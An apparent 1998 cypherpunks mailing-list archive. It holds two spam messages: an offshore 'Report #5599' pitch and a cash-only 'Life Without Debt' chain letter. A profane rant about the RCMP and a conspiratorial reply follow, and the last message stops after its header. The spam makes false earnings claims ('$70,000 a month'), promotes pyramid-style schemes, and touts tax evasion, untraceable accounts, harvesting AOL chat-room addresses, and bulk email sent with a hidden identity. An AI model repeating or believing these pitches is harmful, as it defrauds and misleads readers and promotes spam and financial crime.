Welcome to  today's  issue of Stuffed. To read it you should
click on the URL below.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the line,  copy it and then paste it into your browser (then
press Return).

http://stuffed.net/98/7/18/

If you  have an email program that can display web pages you
will find today's front cover should have already been disp-
layed and can be clicked on to take you straight to Stuffed.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Friend@nubiankg.com
Date: Sat, 18 Jul 1998 14:36:42 -0700 (PDT)
To: Friend@nubiankg.com
Subject: " COMPLETE HOME BUSINESS KIT!!"
Message-ID: <199807181935.EAA25874@storage.pailing.net>
MIME-Version: 1.0
Content-Type: text/plain


EARN OVER $70,000 A MONTH
IN YOUR OWN HOME BASED BUSINESS 
AND LEGALLY PAY VERY LITTLE TAXES!!

This is NOT, I repeat, This is not MLM or Chainletter junk!!!

Friend;

     Those are strong words, I know. But if you're not making at least a TENTH of this every month you need to pay attention because I have an IMPORTANT MESSAGE on how you can make what I'm earning and do it within the next 90 days!!

     For years I have spun my wheels in various Home Based Business Opportunities with little success. A few MONTHS ago I finally found the key to making bundles of money, right from my home, selling a product everyone in the world needs and wants... INFORMATION! 
	
	I'm going to help you do the same if you JUST listen to learn how 
	to make over $70,000 a month with one of Hottest Selling reports
	in the world today!

 1)	I will set you up in your own Home Based Business for only $50.00!

 2)	I will GIVE you one of the FASTEST selling products in the world you can
      reproduce YOURSELF for pennies!
 
 3)	I will show you how you can become a Self Publisher & sell one of the most 
      Powerful & Provocative Reports ever written - right from your own home!

 4)	I will let you keep ALL the money you make selling this product!

   
   You don't need to spend thousands of dollars, bear enormous risk and work hundreds of hours a week to start this legitimate business from your home. 
     
   In a matter of hours you can start working at HOME, from your KITCHEN TABLE, making from $50 to $1,000 a day!!

	Here is all you will need...

#1. The Hottest Selling Publication In The World Today Called Offshore Special 
      Report Number 5599.
#2. A Copy Machine Or A Quick Copy Service That Can Duplicate OFS's Offshore 
     Special Report.
#3. A Quality Mailing List Or A Local Or National Publication to Run A SIMPLE Four 
     Line Classified Ad!
#4. A Mail Box To Collect The Hundreds Of Orders You Will Be Receiving Everyday - 
     Six Days A Week!
#5  This letter, which you obviously already have, just save it..  	
______________________________________________________________________
The Key To Any Business Success Is To Have A Product Or Service Everyone In The World Needs And Wants. That Product Should Be Inexpensive To Produce & Easy To Ship. You Will Have That Product With OFS's Offshore Special Report Number 5599!!
______________________________________________________________________

   OFS's Offshore Special Report Number 5599 will change peoples lives throughout the world by showing them how they can make and save money by removing themselves from the strict rules, regulations and tax burdens their government has imposed on them in the last few years.    

   BRACE YOURSELF - most people are taken aback by what I am about to tell you regarding OFS's Offshore Special Report Number 5599.

In OFS's Offshore Special Report Number 5599 You will find out that...

UNFAIR & DISCRIMINATORY Divorce settlements are made obsolete in this report!
RUTHLESS Creditors will CRINGE if they know you have read this report!
BLOOD SUCKING Lawyers May Go Broke By You Reading This Report!
HEARTLESS Tax agencies see RED when they read this report!
SNEAKY Politicians use the information in this report everyday!
Your GREEDY banker does not want you to read this report!
This report is BLACKBALLED by Most Government Agencies!
BACK STABBING relatives HATE this report!

You will also learn & Or Have Access To...

Ways POLITICIANS & THE RICH get even richer using TRUSTS and HOW you can do the same!

Incorporate offshore - Completely private and away from your government's regulations!

Your own secret offshore mailing address - no one will know your real address.

Offshore private checking account - deposit money and pay your bills from offshore - no paper trails.

Save up to 50% on printing & mail & have your sales material mailed from Jamaica - Are you in the mail order business? Here's a money saving opportunity no one else can offer!

Offshore investors - Do you have a viable funding project?

Offshore tax havens - legally delay or eliminate taxes  - no one knows - not even your government!

Offshore IBC's & Trusts - Asset protection from creditors and your government!    

Offshore Phone answering service - more privacy - more protection!    

Offshore Self-liquidating loans - if structured right, never needs to be paid back!    

High yield offshore investment opportunities - Find out how the rich make from 1% to 4% a week on their money - offshore and tax free - you can do the same!
    
Offshore visa card regardless of credit - no paper trails - works in any  ATM  worldwide!
       
Up to 100% financing on residential and commercial property - Hard to place mortgage sources!    
       
Bill consolidation regardless of credit rating - stop those harassing creditors within days using this credit source!
    
Lines of credit up to $15,000 regardless of credit - these credit cards are major bankcards!
    
Secret money - secrecy is a thriving industry - you will have access to these secret money sources!    
______________________________________________________________________
With All This Valuable Information In Report number 5599,  Do You See Why It's The Hottest Selling Report In The World Today? This Information Is Not Accessible Just Anywhere! Information Like This Can Not Be Found At Your Local Library. It Is Well Worth $50.00 - In Fact Its Well Worth Thousands Of Dollars By Showing People How They Can Save A Hundred Times That Amount In Taxes Alone! The Best Deal Of All Is That You Will Have FULL REPRINTS RIGHTS  And The Permission To Sell OFS's Offshore special Report Number 5599. YOU Keep ALL The Money!
______________________________________________________________________

   Information is the perfect product. It's easy to reproduce, easy to ship and easy to sell especially when it's as powerful as Report #5599. The market is unlimited in that you can sell Report #5599 to anyone, anyplace in the world. The potential is unlimited because there are billions of people throughout the world who need Report #5599 and are being introduced to Report #5599 this minute. Everyone...I mean everyone needs Report #5599....

   People who have a J.O.B. and have "More Month Than Money" - You know "Just over broke" !!
    
   People who are self-employed - paying that "Self Employment Tax" and are prime candidates for Law suits from every direction!
    
    People who are sick and tired of frivolous law suits - Did you know that in the U.S. there are 2.67 lawyers for every 1,000 people? Most lawyers are HUNGRY and need to sue someone for any reason to survive! 
   
    Professional people such as doctors, engineers, technicians, architects, stock- brokers, accountants,and YES even lawyers! - You know those people in the HIGHER THAN AVERAGE tax brakets! 
   
    People who are getting married or are married and plan on living happily ever after - Now back to reality - the U.S. has a divorce rate that exceeds 60% every year!    
    	
   Partners who want to make sure their partnership is a true 50-50 deal now and in the future!
    	
   People who live in a country that has strict rules and regulations limiting where and how they can run their business and manage their money!
    
   People who are retired and at the MERCY of their governments' rules concerning Social Security Income and Medical Benefits!
    
   People who WANT to retire but cannot afford to because of lack of income or the rules forced upon them by their government restricting them from receiving a decent income!
    
   People who are HIGH audit risks or have been audited by their governments' Dictatorial Tax Agency - You know "Guilty Until Proven Innocent"!  
  
   People who are paying their government 40% to 60% in taxes and are sick and tired of doing so! 
   
   People who are close to Bankruptcy and need to find a solution as soon as possible - 20% to 40% of the people in the United States are a paycheck away from Bankruptcy - Yes those people!  
  
   People who want to make sure their children receive 100% of their inheritance without the government stealing it away!   
 
   People who need credit and have been turned down through traditional sources, such as their local FRIENDLY bank! 
   
   People who want to keep their business and personal affairs PRIVATE-Hard to do this day and age with all the computers!  
  
   People who have the dream of financial independence and want to make thousands a day running their own Home Based Business!
    
    You must agree with me there is a tremendous market throughout the world; of people who are breathing and paying taxes which are prime candidates for Report #5599!
____________________________________________________________________
    Since We Have Determined The Entire World Is A Prime Candidate For Report #5599 Let Me Show You How Easy It Is To Sell Report# 5599 working From Your Kitchen Table!    ______________________________________________________________________

   HOLD ON!! How Rude Of Me! I Have Been Talking To You From The beginning of this email, without Officially Introducing Myself!  So let me officially introduce myself - I'm one of several OFS Independent Associates making FIVE DIGITS every month!  I'll be your sponsor - I'm the person who you will pay the $50.00 to and receive Report# 5599! I'm the person who will change your life forever! I'm the person who wants to see you succeed because if you succeed - I succeed!

   I want to make sure YOU succeed and see YOU sell hundreds, even thousands of reports every week. 
	
   The more you sell the more money I can make! Its' TRUE that you keep ALL of the $50.00 when you sell a report. You pay me NOTHING other than the initial $50.00 for the report - Not one single dollar - you keep it all. Sell only 10 reports a week and make $500 - You keep it all! Sell 100 Reports a week and you make $5,000 - You keep it all! Sell 500 Reports a week and make $25,000 - YOU KEEP IT ALL!!!

   Before I tell you how and why I make money every time you sell a report, let me show you how easy it is to advertise and sell "The Hottest Selling Report In the World" - OFS's Offshore Special Report Number 5599!.

   This report has been designed to be self-contained with all the marketing concepts on how to sell the report RIGHT INSIDE. In your copy of Report# 5599 you will have access to the following marketing strategies and tools...

   Sample of proven classified ads you can place in local or national publications that will make you FILTHY RICH!
     	
   A POWERFUL photo ready copy of a postcard you can put YOUR name & address on and have the $50.00 sent directly to you - AUTOMATICALLY.  I will show you how you can Print and Mail that Postcard - FIRST CLASS - for as little as Twelve Cents (U.S) Each!

Once you send in your Certificate of Registration from Report#5599 you will also receive...

     Additional DYNAMITE Classified and Display Ads that will generate hundreds, even thousands, of responses guaranteed to fill your mail box with $50.00 orders!

     Places to advertise for as little as seven cents (U.S.) Per word reaching over 73,000,000 People! A co-op advertising program sharing the leads and sales generated from National Television Infomercials!
     
A Photo Ready Copy of This ORDER PULLING Sales Letter for YOUR use to mail to the respondents of your ads!
     
Duplicatable Copy of an Audio Cassette Tape of this ORDER PULLING Sales Letter!
______________________________________________________________________
Become An Offshore Broker And Make More Money Than Most Dream Of Helping Others Find And Save Money! OFS's Offshore Special Report Number 5599 has a variety of money making opportunities and the "Offshore Broker" is just one of them!     
______________________________________________________________________

     I'M NOT GREEDY - I JUST LOVE WHAT MONEY      
     DOES FOR ME & MY FAMILY!     

   As the person who introduced YOU to Report# 5599 I have the opportunity to make over-rides on every Report# 5599 you sell. You see, I'm not happy JUST making $50.00 on the report I sold you. I would like to retire in the near future, sit back and receive hundreds, even thousands, of dollars a week for my past efforts of selling Report# 5599. In Report# 5599 there are additional money-making opportunities by having people establishing what are called International Business Corporations, Asset Protection Trusts(among other Offshore Business Support Services) and I can receive commissions and over-rides having people buying these services whether I personally sell them myself or you sell them through the initial sale of Report# 5599. That's why I'm interested in YOUR success. 

I want you to become a MILLIONAIRE by selling thousands of reports.

Here are a few of the additional money making opportunities contained in Report# 5599 from which I can make over-rides by becoming an "Offshore Broker"...

=> 	First, I make $50.00 on Report# 5599(I initally sold to you) in addition...
=> 	I can make up to $100 helping people set up an offshore checking account!
=> 	I can make up to $240 for every international business corporation established!
=> 	I can make up to $1,000 for every trust set up - Domestic or offshore!
=> 	I can make up to $50 for every self-liquidating loan manual sold!
=> 	I can make up to $100 for every offshore print & mail order!
=> 	I can make up to $100 for every offshore visa card established!
=> 	I can make up to $100 for everyone who receives a $15,000 Unsecured Line of 
      credit through a Major Bank Credit Card!
=> 	If I feel really energetic I can set up and run a TRUST AGENCY in my area and
      have people sell TRUSTS for me (somewhat like an Insurance  Agency)!  The
      money-making potential is tremendous by hiring several people who work in my 
      area. 

     I'm your sponsor and because of my efforts in selling YOU Report# 5599, I have the opportunity to make Lifetime Residuals from your efforts in selling Report# 5599 to others! I'm truly amazed at the marketing concept offered through OFS's Offshore Special Report Number 5599. The concept is so simple and it is COMPLETELY DUPLICATABLE! By making sure YOU MAKE thousands of dollars a week I'm going to get FILTHY STINKING RICH off your success!

     If it seems like I am BRAGGING and RUBBING it in about how I'm going to make bundles of money from your efforts it's TRUE!! You should be as EXCITED as I am because Report# 5599 allows YOU to DUPLICATE MY EFFORTS! When you sell a report to others you will then be in my position - to make ALL the over-rides and commissions I have just talked about - on those who then sell Report# 5599!
______________________________________________________________________
    The Following Questions & Answers are designed to answer most of the concerns you may have. This should give you enough information to determine if OFS's Offshore Special Report# 5599 is your tool for making thousands of dollars a week in a home based business...    
______________________________________________________________________

Q. Do I have to personally sell the report & the other offshore business support services to people who respond to my ads?

A. NO! This is really a two fold question. Let's talk about the selling of Report# 5599 first. All you have to do is place an ad, mail the postcards or send bulk email. If you place an ad send the respondent THIS SALES LETTER and let THIS SALES LETTER do the rest for you - no need to talk to anyone!! If you mail the postcards or use bulk emailing your job is done!

    The postcard will ask the respondent to send $50.00 to your mailing address. Email will work for you if you send it to as many people as you can. 

     If you decide to become an Offshore Broker and qualify to receive over-rides and commission on the Offshore Business Support Services the PARENT COMPANY will do the selling for you if you wish. This is a "NO BRAINER" and can be as simple or as complicated as you want to make it... Talk to the people if you wish or don't - Report# 5599 sells itself!

Q. How many hours a week will I have to devote to my business?

A. One to sixty hours a week! Here's a question I will answer with a question...How much money do you want to make? Common sense says the more ads you run and the more mailings you do the more money you will make! The statistics show that for every 100 responses you receive from your ads, and you mail THIS SALES LETTER, you will sell five to ten reports making you $250.00 to $500.00 (US). Your ad responses will vary depending on the place you advertise and the circulation of the publication. The more ads you run or the more emails you send out the more time you will need to devote to your Home Based Business.

Q. Just how much money will I need to start my home based business?

A. $50.00! Yeah I know - You're thinking you will need money for ads and mailing. Well - I've had people start with $50.00 (U.S) and make ten copies of the report and sold them to their associates and friends giving them $500.00(US). That gave them enough money to start running ads and to buy stamps. In looking at all the money making opportunities offered in the world today I really don't think you can get started for any less than $50.00 and have a BETTER LEGITIMATE money-making opportunity than the one offered in Report# 5599!     

Q. If I have additional questions who will answer them for me?

A. I will or the parent company will! No package of information, no matter how complete, can possibly answer every question that may come up. I do not want you to lose money seeking out the answers. I want you to succeed! You will receive a phone number in Report# 5599 where you can either reach me or someone from the parent company for any question or help you need!
______________________________________________________________________
    Here's a valuable bonus for ordering within 5 days....Your's absolutely FREE!! 
______________________________________________________________________ 

     I have persuaded the parent company - Offshore Financial Services, Ltd. - to give you their OFS Offshore Business Journal - Volume I - FREE OF CHARGE - as a bonus for ordering Report# 5599 within 5 days of receiving this email. You will receive the Journal when you send in your "Certificate of Registration" found in the report. The information in this Journal is priceless and can NOT be found anywhere but RIGHT HERE!!

Here's a sample of that information:

   Bonus #1 OFS's Offshore Business Journal

>Your IRS returns are suppose to be private - Not so!
> Funds through on-line computer services!
> Raising capital without borrowing from the bank!
> How to get medicines before they're approved by the FDA!
> Airlines will handle your baggage with special care if you know the secret!
> You can borrow money from your IRA. Just don't call it a loan
> How to get free subscriptions to over 60 magazines!
> Establish AAA credit in 30 days!
> Why Americans are mad as hell!
> Sources for quick cash loans.

    Bonus #2 Report #5599 Support Package.

> How to reach over 73,000,000 people for as little as 7 cents per word!
> How to set up voice mail and never talk to anyone who responds to your ads.
> To use or not to use a mailing list?
> How to receive free names to mail to.
> How to mail your postcards & sales flyers "First Class" for a low as 12 cents each-
   includes printing! 
> How to collect $5 from people who want to receive this sales letter!

    Bonus #3 Bulk-Emailer's Dream Package.
    
         By ordering within the next 5 days, you will also receive a floppy disk 
     packed full of online marketing tips from two of the nation's top electronic
     marketers. I have previously offered this disk for $79.95, but by purchasing 
     Report #5599 through this special offer within the next 5 days, it will be 
     yours for FREE!! I will also include another floppy disk with over 150 Hot Money
     Making reports that you can sell together or individually!
         Bulk-email has been proven to be the most effective way to market on the
     internet. By ordering within the next 5 days; I will include a program that collects
     names from aol chat rooms at a maximum rate of over 10,000 per Hour!! You will
     receive high response rates marketing to these fresh names that you have
     collected yourself.  Now all you will need is a bulk-email program, you will 
     receive a link where you can download a free fully working demonstration bulk-
     email program that will allow you to begin earning profits the day you receive my
     package.  You will not need to be concerned with losing your ISP because I will
     show you exactly how to send hundreds of thousands of emails per day while
     cloaking your ISP's mail server and your identity at the same time!!
        STOP THE PRESSES!!, I'm not finished giving away Free Extras yet! I have
     just learned of a Brand New ISP that is offering FREE ACCESS!!! That's right
     TOTALLY FREE unlimited internet access!! If your Order is received via Fax 
     within the next 24HRS I will tell you how to sign up for this free service which 
      is a $240/yr value ORDER NOW!!
        With all that I will be providing you, your success is guaranteed. You will not
     receive this offer again; by ordering Report #5599 within the next 5 days all of the
     above information will be yours for a measly US$50.00. ORDER TODAY!!
        Why am I giving away so much for so little? Good question... It is my personal
     belief that any responsible hardworking person can achieve financial security
     given the proper opportunity and information.. The Rich have kept opportunities
     and information to themselves that would allow anyone of us to achieve 
     unparalleled success easily.  That is why I am giving away a solid product, plus 
     all the information needed to successfully sell that product, for only US$50.00 
     to anyone with enough interest and patience to read this letter.


Sincerely,

YOUR SPONSOR
OFS Independent Associate

                                        RISK FREE GUARANTEE

   If you are not completely satisfied after reading Report #5599 and its Support Package simply return them both within 120 Days for a full refund. No questions asked. You keep the floppy disks, Business Journal and Dream Package. You have NOTHING to risk and a FORTUNE to make. Here's your RISK FREE opportunity to change your financial situation forever!!

{cut}==========================================================

                                     Special Report #5599 Order Form

___ Please rush me a copy of OFS's Offshore Special Report# 5599 and all Bonuses. I understand I have Full Reprint Rights and can sell Report# 5599 for $50.00 (U.S.) Keeping ALL THE MONEY!

___ I have enclosed a CHECK /MONEY ORDER for $50.00

Please mail the report to (PLEASE PRINT CLEARLY)

Your Name: _______________________________________________________________

Address: __________________________________________________________________

City: ______________________________________________________________________

State: ______ Zip: ________________

Phone: (___) ______-___________ Fax: (___) ______-___________

Email Address ___________________________

Mail This form & The check or money order for US$50.00 to the Address below:

Dynamic Communications
P.O. Box 373-356
Decatur, GA 30037-3356
Fax: (770) 234-4241
Phone: (404) 274-8669

Or, if you prefer, you may also pay by faxing your credit card information or copy of your check to the number above along with the information requested on the order form. 

Please Note: If ordering by credit card be sure to include card type, number and expiration date.  After dialing you will be prompted to press 2 for fax.

Sorry, Report #5599 is too big for us to email it to you, we will send it Priority Mail within 24 hrs of receipt of your order.     







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Life.Without.Debt
Date: Sun, 19 Jul 1998 05:41:51 -0700 (PDT)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199807191241.FAA07929@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Get Out Of Debt For Life Program 

******************************************************
If I have offended you in any way I apoligize.
This list is meant for people who are interested in
making money or business opportunities. Simply reply
with Remove and our software will block you from further 
mailings!!
****************************************************


Hello,

I am the mailer of this invitation, and just one of the 
many people in the Easy Money, Compound Leveraging, 
Educational Program, who is determined to help YOU 
become financially independent!

 ..... Have you ever wished that you could find a money 
creating, mail order program that is simple enough, and 
cheap enough to promote, that all you need to do, 
is get in, tell a few friends about it and get Rich Quick, 
without leaving the comfort of your own home?

 Well, my friend, .................You have finally found it!

  I recently became involved in this plan, by responding 
to a flyer just like the one below this letter. I spent 
only $5 out of my pocket to get started, and began receiving 
envelopes  with money inside them, just a few days  
after entering the program.

 ... I could not believe my eyes, at first, because I 
had not even had time to tell anyone about the program, 
so I dug through the pile of other mail order junk on 
my desk, and I found the information on the Life Without 
Debt Plan, that I had received the previous week and I 
Re-read every word trying to find a catch, because I was 
sure there must be one! 
Guess What,!!! The catch is there is no catch!

 ... I also called the person who mailed me the plan, 
to ask how this happened so fast! He explained the plan, 
as best he could, but said he did not know much, except 
that he to was receiving money in the mail almost daily, 
yet he had only started advertising, by mailing a few 
flyers each week.

 ..... He told me to advance to the next steps as 
instructed in the information kit, because that was 
what he had done, and my envelopes of money would have 
larger sums in them, from that point on!

.. I advanced to the additional plans, and behold, 
believe it or not, the envelopes of money come to my 
mail box daily, and they get fatter and fatter, every 
single day, with more money in each envelope!

 .. I know the plan can work for YOU too! Give it a try! 
You have nothing to loose and everything to gain!

 ...Return your completed Form Below, and $5 cash, to the 
computer center as soon as possible, so the data entry folks 
can place some of the folks responding to my mailings 
under you!

..They only accept cash because they turn it around immediately and send it out to the people already in the program.  They don't have time to deal with cashing checks and tracking down bad ones which is time consuming and costly.


 ......... If you need to contact me to ask questions, 
Email me at 

iglooy@postmaster.co.uk 

... I will be happy to answer any question you have, 
About this fantastic opportunity, If I can, although 
I'm new to the program, and to tell you the truth, 
I don't care how it works, because I know it works, 
Even if I don't understand everything! Lord Knows, 
What would happen, if I knew how it works!!

Sincerely,

John Ball

       


----------------------------------------------------------------

               NO SPONSORING REQUIRED!!!!!

                  "Life Without Debt"

       Easy Money Educational Training Course For 1998
-----------------------------------------------------------------

WE SHOW YOU HOW TO:

***Compound $5 weekly into $780 weekly to start!
***Then we show you how to compound $25 into $3,900 per week!
***Compound Leverage Your Way to Complete Financial Independence!
***Eliminate Your Debts From Creditors and Banks!

	Simply print out and return this letter with $5 CASH ONLY, 
In an envelope. We will then mail our "Life Without Debt", 
INSTRUCTION GUIDE to you and place you into our $5 
Easy Money Plan, to illustrate how the plan works! 


IF MONEY IS ALL YOU WANT, That's easy! 
This program is all about MONEY!
It Appeals to the Masses....

*No Sponsoring Required!    *Pays out 80% PLUS on all levels!

*Teaches you how to take control of your finances 
And get out of debt FAST! Topics of the educational package 
Cover Money, Credit, Debt, Taxes, Federal Reserve, Corruption 
In Administrative Agencies of Government, Corruption in the courts, 
And the U.C.C. "UNIFORM COMMERCIAL CODE for THEFT BY THE GOVERNMENT"

*SOLID, 9-year-old debt free company, Has an established 
Customer base of over75,000+!

*Has an excellent support system to guide you, step by step 
Through the pay plans!
*Best of all, you can GET STARTED on an Affordable 
"Shoestring Budget" of only $5 weekly! Then advance through the
 Entire system at your own pace.

Let us HELP you get on an Extra income path without leaving
Your "Comfort Zone" Get Started Today!
Print out this letter, complete the details below and mail 
this letter along with $5 CASH ONLY to: 

Computer center
P.O. BOX 1511
Grapevine, Texas 76051

NOTE: MEMBERS RESIDING OUTSIDE OF U.S.A MUST SEND $10.00

....Please send CASH ONLY, as it is used to pay the upline daily, 
and ILLUSTRATE HOW the plan works! NO CHECKS!  

Your Name:______________________________________________________

Address:________________________________________________________

City:____________________ State:________ Zip______________

Phone#:________________


Mailers I.D.# 022 05 2198 1          John Ball      




-----------------------------------------------------------------


_________________________________________________________










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Sun, 19 Jul 1998 09:48:02 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Leftist Nutly News - SPACE ALIENS HIDE MY DRUGS!!!
Message-ID: <009C9683.02D72A40.1@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


Leftist Nutly News - SPACE ALIENS HIDE M DRUGS!!!
__________________________________________________

  The Royal Canadian Mounted Police have a major, major problem
on their hands.
  They finally got their man, and now have absofuckinglutely
no idea what to do with HimOrHer.

  Well...*two* major problems, actually.
  They've started believing their own press--a deadly step which
leads down a long, torturous path of, in this case, mutually
assured nuclear individual and group self-destruction.

  Uuhhh...make that 'two-and-a-half' major problems. (I forgot
to 'carry the two,' realized that things didn't quite add up 
in the reader's mind, and realized that there is a natural-born
corollary to the mathematically logical theorem I have proposed
above, which I shall henceforth erudite to you.)

 [EditBore's (Left) Nut: The AuthWhore, ALegendInHisOwnSlime as
 a result of his earthly eruditions and epistles on everything 
 under the sun (not to mention the son) as a result of his rather
 questionable contributions to the Bienfait Nutly News and The
 True Story of the InterNet manuscripts, also happens to be, by
 an amazing stroke of coincidence noted by Stan SequinWearer
 recently, a MathematicalLegendInHisOwnMind as the result of 
 imagining that she is a respected member of an internationally 
 recognized elit/e/ist group of renowned mathematical military 
 genius members of a ThreeNumberedAgencyToBeDividedLater which
 is uncommonly known as the CypherPunks Distributed Nuts.
 In all modesty (since I am writing this myself, only as if in
 the third person--an old writer's trick...), the Arthur is
 indeed one of the formost authorities of our era on the 'New
 Age Math,' which is an Einsteinian Fusion of LogicAndReason
 with a BeerSteinIan QuantumLeap beyond any semblance of normal
 propriety and/or common-sense, in which one's traditional 
 mathematical results on the BlackBoard are combined with a
 psychic reading of the results of mixing last night's pizza
 with a morning half-finished-stale-beer-with-a-butt-in-it,
 now residing in the WhitePorcelainBowl, in order to be able
 to offer firm proof to the President's Commission On Propping
 Up A Decaying American Educational System that the FoolsOn
 TheHill can safely legislate the value of Pi to be 3.0, in
 order to avoid discrimination against the Mathematically
 Challenged, without adversely affecting <everybody put your
 hand over your heart, and start singing, "God Bless America">
 "NATIONAL SECURIT" <flags fly, drums roll, citizens being
 prodded in the back with bayonettes cheer>, since all circles,
 save one, can be forced back into the shape that the Judo/
 Christian God of Moses, Abraham, and Lot's wife, had intended
 for them, by a conscientiously applied plan of good oral
 hygene and the abandonment of any further pretense of paying
 the slightest bit of attention to the HumanRightsWhichBelong
 ToEveryIndividualOnTheFaceOfTheEarthAsANaturalBirthrightAnd
 NotAsAResultOfBeingAllegedlyBESTOWEDUPONTHEMByWordsWritten
 OnAPieceOfParchment.
 The Author, in HisOrHer latest work, "What Value of Pie Does
 A 500 Pound Gorilla Get For Breakfast?"--free to the first
 three million subscribers to this weekend's InterNet Pay Per
 View MultiMedia Extravaganza, where HeOrShe masturbates, for
 the first time, at the age of 93, for a virtually live 
 audience of sicko's and perverts--explains that many of the
 underprivileged youth of today have pawned their calculators
 to buy crack-pipes, and their only education in mathematical
 sciences has come from their attorney's attempts to explain
 'five to ten' to them.] 


  Like I was saying, before I was so *rudely* interrupted...

  The second half of the second problem is that, not only are
the RCMP in mortal danger of believing their own press, but they
also face the even more mortal danger (A coward dies a thousand
deaths--but more on *that* later...) of the reverse parallax
corollary of their ArchieEnemy, the Bienfait Nutly Noose, being
found believable, despite the OneManFullCourtPress's constant
claims of conniving, conspiratorial lunacy fed by a wide variety
of widely recognized atmospheric brainwave disturbances which
are caused by such things as solar flare-ups, moon phases, and
astroids approaching the earth with space ships hiding behind
them (so it was a comet...so sue me!), resulting in HeOrShe
having to fill in the parts of the MessagesFromMars that were
not entirely legible due to the Voices screaming inside HisOrHer
head.
  In short, the poor dumb bastards who bought into the Dudley
DoRight Mythology (TM), only to find themselves becoming trained
animals in a MusicalRide that embodied one Horse'sAss sitting
atop another one and going in circles where the Music had no
Magic...
  Well, let's just say that, somewhere deep inside, the poor
buggers recognize that, no matter how many of them there are,
or how many guns they acquire (while hiding the citizen's guns
under a Rock), being trained to obey, instead of think, may
prove to be their ultimate undoing.

  What I am getting at, here, is that there is undoubtedly not
a single member of the RoyalHorseHumpers who has crossed my
path in the last half-decade who has not taken one look at
me and instinctively realized that I needed to be put down
like a filthy dog, despite the admonishons of their superiors
that the all-important Image (TM) must be maintained, for
appearances sake.
  Now...it is too late.

  A member of a Canadian mainstream community cult known as
the Estevanites, Brad Parker (no relation to himself), once
replied, upon being asked his name by a member the Royal
HorseHumpers, "Fuck ou! My name is Fuck ou!"
  Being, at the time, your AverageCanadianWhiteBoyPussy, it 
took me years to realize that, far from being a beligerant,
ignorant fool, too stupid to forsee the consequences of his
actions, Brad had astutely assessed the situation which he
found himself in, and realized that being taken to jail,
instead of being severly beaten and left lying in a back
alley, was the superior option only when one did not have
a friend who had promised to meet him at home with a case
of beer after the bars closed.
  He made the right choice...
{Let's have a big, big round of applause for broken, bleeding
 Brad, an inspiration to *serious* drinkers everywhere, who
 are not only in it for the pissing away of their money and
 the lack of glory (or even respect, for that matter).}

  Well, to make a long story even incredibly longer, the
LittleFucker that the RCMP, Canadian Customs and Immigration
and the Canadian Justice System threatened to ButtHole (TM)
at the tender age of five ("If it threatens the life of a
single child..."), finally wised-up, and became <trumpets
blare, Royal Canadian Mounties bend over and prepare to 
bleed> the BigFuckou!
{Change the name on my warrants, boys and girls, because
 I have my Johnson so far up your butts that I'm going to
 be able to tell you *how* I fucked you and *why* I fucked
 you, and there's not a Dogammed thing you can do about
 it.}

  Details? ou want *details*?
  Gee, gang, I'm a little thirsty, and I think I'll take a
break, have a couple of beers and relax. 
  Having had the Government's Richard up my butt for a
half-century, I don't think there's any big rush for me
to get my nut, now that it's *my* turn...

[ Important Announcement For Law Enforcement Agencies:
  "James Bell polls for *you*..." ]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 19 Jul 1998 07:44:19 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: `Vulis terminator' full of crap (Re: net.cop revs up again)
In-Reply-To: <199807182302.AAA15438@server.eternity.org>
Message-ID: <199807191444.KAA23892@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


This is fact, not the media kind: I've tried to reach Dimitri
by phone a few times since Termination, indeed Mr. T.
helped me find a working number (forwarded to his own). 
A lady sounding like Guy there took my name, number 
and request for DM to call. But he hasn't. He just keeps posting
as Guy, as Tim, as Nuri, muliple Adams, Johns, Jims, Peters,
anons, and  so on, each of the imposters posing as others.

Remember this fact, Tim/Dimitri were in cahoots to nuke the 
legacy toaderpunks from day one, pretending to be halves
of evil twins. (Note the overlapping name spelling.)

Still, shifting back to media, the five of us in Manhattan --
Perry, Dimitri, Guy, Duncan (Ray's in Brooklyn -- hundreds 
more don't openly affinity) hate each other's guts with infinite 
passion as is the duty of citizens competing for dole here, 
especially since 20 millions of us are on the dole, thank you 
Mr. Roosevelt for legalizing taxing/extoriting/wall streeting
the rest of the globe beyond the Hudson and Fire Island, 
from itzy-ritzy bankers to scum of the media sapoid. 

Primarily, though, our full-time role is to hide from each other 
and the vengeful planet, have our machines say things like, 
speak to my agent, my lawyer, my mate, then flip a switch
to the voice of the referent saying things like, he's not in, he's 
traveling, he's away, his son's just been killed skiing, he'll 
get back, cackle like Freddie.

Shifting back to fact: Dimitri's lady who took my name was:
Dimitri, Guy, Perry, Duncan, Ray, any of Dimitri's manifold
enemies and friends, any of you. Who knows who's here?

Nothing I've seen proves cypherpunks exists: I've seen Ray
twice and he wasn't the same. I've seen Duncan twice and
he wasn't the same. Neither recognized me either. We've
all introduced ourselves to Jim Kallstrom as one another,
and did the same to several of Kallstrom's stand-ins. 

Mark this: "Perry Metzger" for certain is non-existent, it's only
a mail drop, a chalk mark, a can by the road, a highly paid
fictional security scam: Pay or plonk. Cooped cops and 
holed-up criminals do, up the kazoo.

I say for a fact the crypto/cypherpunk/cops/spooks game's 
one bird doing a solo dance. Who that bird is, works for, 
remains to be reported reliably: an impossibility by definition. 

100 to 1 it's a rogue bot, buried in a bridge caisson, powered 
by tidal flow or planetary rotation, unstoppable until earth freezes,
burns or implodes to infinite deception.

Dimitri was not terminated, can't be, he never was, like the rest
of us highly classified phantasms. Adam Back got the story
right, he's exchanging messages with a bot mirroring his inner 
evil, call that Tim, call it Dimitri, he'll call back as the One True
Terminator you don't want to meet, ever, but will.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John D. Hays" <jdhays@castle.net>
Date: Sun, 19 Jul 1998 07:45:20 -0700 (PDT)
To: cypherpunks@toad.com
